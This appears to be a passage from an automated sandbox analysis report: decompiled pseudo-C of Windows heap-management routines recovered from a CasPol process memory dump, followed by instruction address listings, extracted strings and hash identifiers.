											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E013DA229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E013DA309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E013DBC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0147A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E0140D540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E013BB150();
													} else {
														E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E013BB150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x14a6378 = 1;
														asm("int3");
														 *0x14a6378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E013DA229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E013DA309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E013DBC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E013DBC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                                                        0x013d99ca
                                                                        0x013d99cc
                                                                        0x013d99df
                                                                        0x013d99e3
                                                                        0x013d99f8
                                                                        0x013d99fb
                                                                        0x013d99fb
                                                                        0x00000000
                                                                        0x013d9a48
                                                                        0x013d9a48
                                                                        0x013d9a4c
                                                                        0x013d9a51
                                                                        0x013d9a55
                                                                        0x013d9a61
                                                                        0x013d9a66
                                                                        0x013d9a68
                                                                        0x01421457
                                                                        0x0142145c
                                                                        0x0142145c
                                                                        0x013d9a68
                                                                        0x013d9a6e
                                                                        0x013d9a71
                                                                        0x013d9a74
                                                                        0x013d9a76
                                                                        0x01421466
                                                                        0x01421469
                                                                        0x01421469
                                                                        0x0142146c
                                                                        0x0142146e
                                                                        0x01421471
                                                                        0x01421474
                                                                        0x01421477
                                                                        0x01421479
                                                                        0x0142159c
                                                                        0x0142159c
                                                                        0x0142159d
                                                                        0x014215a6
                                                                        0x014215ab
                                                                        0x014215ab
                                                                        0x00000000
                                                                        0x014215ab
                                                                        0x0142147f
                                                                        0x01421481
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142148a
                                                                        0x0142148d
                                                                        0x01421493
                                                                        0x01421495
                                                                        0x014214c0
                                                                        0x014214c0
                                                                        0x014214c3
                                                                        0x014214c6
                                                                        0x014214c8
                                                                        0x014214cb
                                                                        0x014214cf
                                                                        0x014214f2
                                                                        0x014214f2
                                                                        0x014214f5
                                                                        0x014214f8
                                                                        0x01421501
                                                                        0x01421508
                                                                        0x0142150b
                                                                        0x0142150e
                                                                        0x01421510
                                                                        0x01421513
                                                                        0x01421515
                                                                        0x01421515
                                                                        0x01421518
                                                                        0x01421518
                                                                        0x01421513
                                                                        0x01421521
                                                                        0x01421525
                                                                        0x0142152a
                                                                        0x0142152d
                                                                        0x01421530
                                                                        0x01421532
                                                                        0x01421539
                                                                        0x0142153d
                                                                        0x0142155d
                                                                        0x01421562
                                                                        0x0142153f
                                                                        0x01421555
                                                                        0x0142155a
                                                                        0x01421570
                                                                        0x01421577
                                                                        0x0142157c
                                                                        0x01421582
                                                                        0x01421585
                                                                        0x01421589
                                                                        0x0142158b
                                                                        0x01421592
                                                                        0x01421593
                                                                        0x01421593
                                                                        0x01421589
                                                                        0x01421530
                                                                        0x00000000
                                                                        0x014214f8
                                                                        0x014214d5
                                                                        0x014214da
                                                                        0x014214dc
                                                                        0x00000000
                                                                        0x014214de
                                                                        0x014214e8
                                                                        0x00000000
                                                                        0x014214e8
                                                                        0x01421497
                                                                        0x01421497
                                                                        0x014214a4
                                                                        0x014214a4
                                                                        0x014214a7
                                                                        0x014214a9
                                                                        0x014214ab
                                                                        0x014214ab
                                                                        0x0142149c
                                                                        0x0142149e
                                                                        0x014214a0
                                                                        0x014214b0
                                                                        0x014214b0
                                                                        0x00000000
                                                                        0x014214a2
                                                                        0x014214a2
                                                                        0x00000000
                                                                        0x014214a2
                                                                        0x014214a0
                                                                        0x014214b3
                                                                        0x014214bb
                                                                        0x00000000
                                                                        0x014214bb
                                                                        0x01421495
                                                                        0x013d9a7c
                                                                        0x013d9a7c
                                                                        0x013d9a7f
                                                                        0x013d9a7f
                                                                        0x013d9a82
                                                                        0x013d9a84
                                                                        0x013d9a87
                                                                        0x013d9a8a
                                                                        0x013d9a8d
                                                                        0x013d9a8f
                                                                        0x0142166a
                                                                        0x0142166a
                                                                        0x0142166b
                                                                        0x01421674
                                                                        0x00000000
                                                                        0x01421674
                                                                        0x013d9a95
                                                                        0x013d9a97
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d9aa0
                                                                        0x013d9aa3
                                                                        0x013d9aa9
                                                                        0x013d9aab
                                                                        0x013d9ad7
                                                                        0x013d9ad7
                                                                        0x013d9ada
                                                                        0x013d9add
                                                                        0x013d9adf
                                                                        0x013d9ae2
                                                                        0x013d9ae6
                                                                        0x013d9b22
                                                                        0x013d9b27
                                                                        0x013d9b29
                                                                        0x00000000
                                                                        0x013d9b2b
                                                                        0x014215be
                                                                        0x00000000
                                                                        0x014215be
                                                                        0x013d9b29
                                                                        0x013d9ae8
                                                                        0x013d9ae8
                                                                        0x013d9aeb
                                                                        0x013d9aee
                                                                        0x014215cb
                                                                        0x014215d2
                                                                        0x014215d5
                                                                        0x014215d7
                                                                        0x014215da
                                                                        0x014215dc
                                                                        0x014215dc
                                                                        0x014215dc
                                                                        0x014215da
                                                                        0x014215e5
                                                                        0x014215e9
                                                                        0x014215ee
                                                                        0x014215f1
                                                                        0x014215f3
                                                                        0x014215f9
                                                                        0x01421600
                                                                        0x01421604
                                                                        0x01421624
                                                                        0x01421629
                                                                        0x01421606
                                                                        0x0142161c
                                                                        0x01421621
                                                                        0x01421637
                                                                        0x0142163e
                                                                        0x01421643
                                                                        0x01421649
                                                                        0x0142164c
                                                                        0x01421650
                                                                        0x01421656
                                                                        0x0142165d
                                                                        0x0142165e
                                                                        0x0142165e
                                                                        0x01421650
                                                                        0x014215f3
                                                                        0x013d9af4
                                                                        0x013d9af7
                                                                        0x013d9afc
                                                                        0x013d9b00
                                                                        0x013d9b04
                                                                        0x013d9b08
                                                                        0x013d9b14
                                                                        0x013d99fe
                                                                        0x013d9a04
                                                                        0x013d9a07
                                                                        0x00000000
                                                                        0x013d9a29
                                                                        0x0142169c
                                                                        0x014216a0
                                                                        0x014216a5
                                                                        0x014216a9
                                                                        0x014216b5
                                                                        0x014216ba
                                                                        0x014216bc
                                                                        0x014216be
                                                                        0x014216c3
                                                                        0x014216c3
                                                                        0x014216bc
                                                                        0x014216c8
                                                                        0x014216cc
                                                                        0x0142181b
                                                                        0x0142181b
                                                                        0x0142181e
                                                                        0x0142181e
                                                                        0x01421821
                                                                        0x01421823
                                                                        0x01421826
                                                                        0x01421829
                                                                        0x0142182c
                                                                        0x0142182e
                                                                        0x01421688
                                                                        0x01421688
                                                                        0x01421689
                                                                        0x0142168b
                                                                        0x0142168c
                                                                        0x0142168d
                                                                        0x0142168f
                                                                        0x01421692
                                                                        0x00000000
                                                                        0x01421692
                                                                        0x01421834
                                                                        0x01421836
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142183f
                                                                        0x01421842
                                                                        0x01421848
                                                                        0x0142184a
                                                                        0x01421875
                                                                        0x01421875
                                                                        0x01421878
                                                                        0x0142187b
                                                                        0x0142187d
                                                                        0x01421880
                                                                        0x01421884
                                                                        0x014218a7
                                                                        0x014218a7
                                                                        0x014218aa
                                                                        0x014218ad
                                                                        0x014218b6
                                                                        0x014218bd
                                                                        0x014218c0
                                                                        0x014218c3
                                                                        0x014218c5
                                                                        0x014218c8
                                                                        0x014218ca
                                                                        0x014218ca
                                                                        0x014218cd
                                                                        0x014218cd
                                                                        0x014218c8
                                                                        0x014218d5
                                                                        0x014218da
                                                                        0x014218df
                                                                        0x014218e2
                                                                        0x014218e5
                                                                        0x014218e7
                                                                        0x014218ee
                                                                        0x014218f2
                                                                        0x01421912
                                                                        0x01421917
                                                                        0x014218f4
                                                                        0x0142190a
                                                                        0x0142190f
                                                                        0x01421925
                                                                        0x0142192c
                                                                        0x01421931
                                                                        0x0142193a
                                                                        0x0142193e
                                                                        0x01421940
                                                                        0x01421947
                                                                        0x01421948
                                                                        0x01421948
                                                                        0x0142193e
                                                                        0x014218e5
                                                                        0x0142194f
                                                                        0x01421952
                                                                        0x01421956
                                                                        0x0142195d
                                                                        0x01421961
                                                                        0x0142196d
                                                                        0x00000000
                                                                        0x0142196d
                                                                        0x0142188a
                                                                        0x0142188f
                                                                        0x01421891
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0142189d
                                                                        0x00000000
                                                                        0x0142189d
                                                                        0x0142184c
                                                                        0x01421859
                                                                        0x01421859
                                                                        0x0142185c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421851
                                                                        0x01421853
                                                                        0x01421855
                                                                        0x01421865
                                                                        0x01421865
                                                                        0x01421866
                                                                        0x01421868
                                                                        0x01421870
                                                                        0x00000000
                                                                        0x01421870
                                                                        0x01421857
                                                                        0x01421857
                                                                        0x0142185e
                                                                        0x00000000
                                                                        0x014216d2
                                                                        0x014216d2
                                                                        0x014216d5
                                                                        0x014216d5
                                                                        0x014216d8
                                                                        0x014216da
                                                                        0x014216dd
                                                                        0x014216e0
                                                                        0x014216e3
                                                                        0x014216e5
                                                                        0x01421808
                                                                        0x01421808
                                                                        0x01421809
                                                                        0x01421812
                                                                        0x01421817
                                                                        0x01421817
                                                                        0x00000000
                                                                        0x01421817
                                                                        0x014216eb
                                                                        0x014216ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x014216f6
                                                                        0x014216f9
                                                                        0x014216ff
                                                                        0x01421701
                                                                        0x0142172c
                                                                        0x0142172c
                                                                        0x0142172f
                                                                        0x01421732
                                                                        0x01421734
                                                                        0x01421737
                                                                        0x0142173b
                                                                        0x0142175e
                                                                        0x0142175e
                                                                        0x01421761
                                                                        0x01421764
                                                                        0x0142176d
                                                                        0x01421774
                                                                        0x01421777
                                                                        0x0142177a
                                                                        0x0142177c
                                                                        0x0142177f
                                                                        0x01421781
                                                                        0x01421781
                                                                        0x01421784
                                                                        0x01421784
                                                                        0x0142177f
                                                                        0x0142178c
                                                                        0x01421791
                                                                        0x01421796
                                                                        0x01421799
                                                                        0x0142179c
                                                                        0x0142179e
                                                                        0x014217a5
                                                                        0x014217a9
                                                                        0x014217c9
                                                                        0x014217ce
                                                                        0x014217ab
                                                                        0x014217c1
                                                                        0x014217c6
                                                                        0x014217dc
                                                                        0x014217e3
                                                                        0x014217e8
                                                                        0x014217ee
                                                                        0x014217f1
                                                                        0x014217f5
                                                                        0x014217f7
                                                                        0x014217fe
                                                                        0x014217ff
                                                                        0x014217ff
                                                                        0x014217f5
                                                                        0x0142179c
                                                                        0x00000000
                                                                        0x01421764
                                                                        0x01421741
                                                                        0x01421746
                                                                        0x01421748
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421754
                                                                        0x00000000
                                                                        0x01421754
                                                                        0x01421703
                                                                        0x01421710
                                                                        0x01421710
                                                                        0x01421713
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x01421708
                                                                        0x0142170a
                                                                        0x0142170c
                                                                        0x0142171c
                                                                        0x0142171c
                                                                        0x0142171d
                                                                        0x0142171f
                                                                        0x01421727
                                                                        0x00000000
                                                                        0x01421727
                                                                        0x0142170e
                                                                        0x0142170e
                                                                        0x01421715
                                                                        0x00000000
                                                                        0x01421715
                                                                        0x014216cc
                                                                        0x013d9a45
                                                                        0x013d9a45
                                                                        0x013d9a0e
                                                                        0x013d9a1c
                                                                        0x013d9a23
                                                                        0x0142167e
                                                                        0x0142167f
                                                                        0x01421681
                                                                        0x01421683
                                                                        0x01421684
                                                                        0x00000000
                                                                        0x01421684
                                                                        0x00000000
                                                                        0x013d9aad
                                                                        0x013d9aad
                                                                        0x013d9ab0
                                                                        0x013d9ab3
                                                                        0x013d9ab3
                                                                        0x013d9ab6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013d9ab8
                                                                        0x013d9aba
                                                                        0x013d9abc
                                                                        0x013d9ac8
                                                                        0x013d9ac8
                                                                        0x00000000
                                                                        0x013d9abe
                                                                        0x013d9abe
                                                                        0x013d9ac0
                                                                        0x00000000
                                                                        0x013d9ac0
                                                                        0x013d9abc
                                                                        0x013d9ad2
                                                                        0x00000000
                                                                        0x013d9ad2
                                                                        0x013d9aab

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                        • API String ID: 0-3178619729
                                                                        • Opcode ID: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                                        • Instruction ID: 4aaf2074cbb7b49eb56351cb33526a0b12f98ae13bf8e6f2f9f5ca5888bdb435
                                                                        • Opcode Fuzzy Hash: 44fce0629ced90a466c3a93bf3236c2671a543b829181fa8ad01e2f2887dbc6e
                                                                        • Instruction Fuzzy Hash: 3E2212706002569FEB25CF2DC484B7ABBB5EF44B08F18856EE8468B366E775D881CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DB477 Relevance: 4.2, Strings: 3, Instructions: 405COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 67%
                                                                        			E013DB477(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int* _v20;
				signed int _v24;
				char _v28;
				signed int _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t139;
				void* _t141;
				signed int* _t143;
				signed int* _t144;
				intOrPtr* _t147;
				char _t160;
				signed int* _t163;
				signed char* _t164;
				intOrPtr _t165;
				signed int* _t167;
				signed char* _t168;
				intOrPtr _t193;
				intOrPtr* _t195;
				signed int _t203;
				signed int _t209;
				signed int _t211;
				intOrPtr _t214;
				intOrPtr* _t231;
				intOrPtr* _t236;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t240;
				intOrPtr _t241;
				char _t243;
				signed int _t252;
				signed int _t254;
				signed char _t259;
				signed int _t264;
				signed int _t268;
				intOrPtr _t277;
				unsigned int _t279;
				signed int* _t283;
				intOrPtr* _t284;
				unsigned int _t287;
				signed int _t291;
				signed int _t293;

				_v8 =  *0x14ad360 ^ _t293;
				_t223 = __edx;
				_v20 = __edx;
				_t291 = __ecx;
				_t276 =  *__edx;
				_t231 = E013DB8E4( *__edx);
				_t292 = __ecx + 0x8c;
				_v16 = _t231;
				if(_t231 == __ecx + 0x8c) {
					L38:
					_t131 = 0;
					L34:
					return E013FB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
				}
				if( *0x14a8748 >= 1) {
					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
					if(__eflags < 0) {
						_t214 =  *[fs:0x30];
						__eflags =  *(_t214 + 0xc);
						if( *(_t214 + 0xc) == 0) {
							_push("HEAP: ");
							E013BB150();
						} else {
							E013BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E013BB150();
						__eflags =  *0x14a7bc8;
						if(__eflags == 0) {
							__eflags = 1;
							E01472073(_t223, 1, _t291, 1);
						}
						_t231 = _v16;
					}
				}
				_t5 = _t231 - 8; // -8
				_t292 = _t5;
				_t134 =  *((intOrPtr*)(_t292 + 6));
				if(_t134 != 0) {
					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_t223 = _t291;
				}
				_t276 = _v20;
				_v28 =  *((intOrPtr*)(_t231 + 0x10));
				_t139 =  *(_t291 + 0xcc) ^  *0x14a8a68;
				_v12 = _t139;
				if(_t139 != 0) {
					 *0x14ab1e0(_t291,  &_v28, _t276);
					_t141 = _v12();
					goto L8;
				} else {
					_t203 =  *((intOrPtr*)(_t231 + 0x14));
					_v12 = _t203;
					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
						_t264 = _v12;
						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t276 = _t264;
						}
					}
					_t209 =  *(_t291 + 0x40) & 0x00040000;
					asm("sbb ecx, ecx");
					_t268 = ( ~_t209 & 0x0000003c) + 4;
					_v12 = _t268;
					if(_t209 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v48);
						_push(3);
						_push(_t291);
						_push(0xffffffff);
						_t211 = E013F9730();
						__eflags = _t211;
						if(_t211 < 0) {
							L56:
							_push(_t268);
							_t276 = _t291;
							E0147A80D(_t291, 1, _v44, 0);
							_t268 = 4;
							goto L7;
						}
						__eflags = _v44 & 0x00000060;
						if((_v44 & 0x00000060) == 0) {
							goto L56;
						}
						__eflags = _v48 - _t291;
						if(__eflags != 0) {
							goto L56;
						}
						_t268 = _v12;
					}
					L7:
					_push(_t268);
					_push(0x1000);
					_push(_v20);
					_push(0);
					_push( &_v28);
					_push(0xffffffff);
					_t141 = E013F9660();
					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
					L8:
					if(_t141 < 0) {
						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
						goto L38;
					}
					_t143 =  *( *[fs:0x30] + 0x50);
					if(_t143 != 0) {
						__eflags =  *_t143;
						if(__eflags == 0) {
							goto L10;
						}
						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
						L11:
						if( *_t144 != 0) {
							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E0147138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E0146FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E0147A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E0147A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E013D7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E01471582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E013D7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E01471582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E013DB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E013DBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E0147A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                        0x013db486
                                                                        0x013db48a
                                                                        0x013db48e
                                                                        0x013db491
                                                                        0x013db493
                                                                        0x013db49a
                                                                        0x013db49c
                                                                        0x013db4a2
                                                                        0x013db4a7
                                                                        0x013db6fc
                                                                        0x013db6fc
                                                                        0x013db6b3
                                                                        0x013db6c3
                                                                        0x013db6c3
                                                                        0x013db4b4
                                                                        0x0142294f
                                                                        0x01422951
                                                                        0x01422957
                                                                        0x0142295d
                                                                        0x01422961
                                                                        0x01422980
                                                                        0x01422985
                                                                        0x01422963
                                                                        0x01422978
                                                                        0x0142297d
                                                                        0x0142298b
                                                                        0x01422990
                                                                        0x01422995
                                                                        0x0142299d
                                                                        0x014229a1
                                                                        0x014229a2
                                                                        0x014229a2
                                                                        0x014229a7
                                                                        0x014229a7
                                                                        0x01422951
                                                                        0x013db4ba
                                                                        0x013db4ba
                                                                        0x013db4bd
                                                                        0x013db4c2
                                                                        0x013db6d4
                                                                        0x013db4c8
                                                                        0x013db4c8
                                                                        0x013db4c8
                                                                        0x013db4cd
                                                                        0x013db4d0
                                                                        0x013db4d9
                                                                        0x013db4df
                                                                        0x013db4e2
                                                                        0x014229b7
                                                                        0x014229bd
                                                                        0x00000000
                                                                        0x013db4e8
                                                                        0x013db4e8
                                                                        0x013db4ef
                                                                        0x013db4fa
                                                                        0x013db703
                                                                        0x013db709
                                                                        0x013db70b
                                                                        0x013db711
                                                                        0x013db711
                                                                        0x013db70b
                                                                        0x013db503
                                                                        0x013db50c
                                                                        0x013db511
                                                                        0x013db514
                                                                        0x013db519
                                                                        0x014229c5
                                                                        0x014229c7
                                                                        0x014229cc
                                                                        0x014229cd
                                                                        0x014229cf
                                                                        0x014229d0
                                                                        0x014229d2
                                                                        0x014229d7
                                                                        0x014229d9
                                                                        0x014229ee
                                                                        0x014229ee
                                                                        0x014229f4
                                                                        0x014229fa
                                                                        0x01422a01
                                                                        0x00000000
                                                                        0x01422a01
                                                                        0x014229db
                                                                        0x014229df
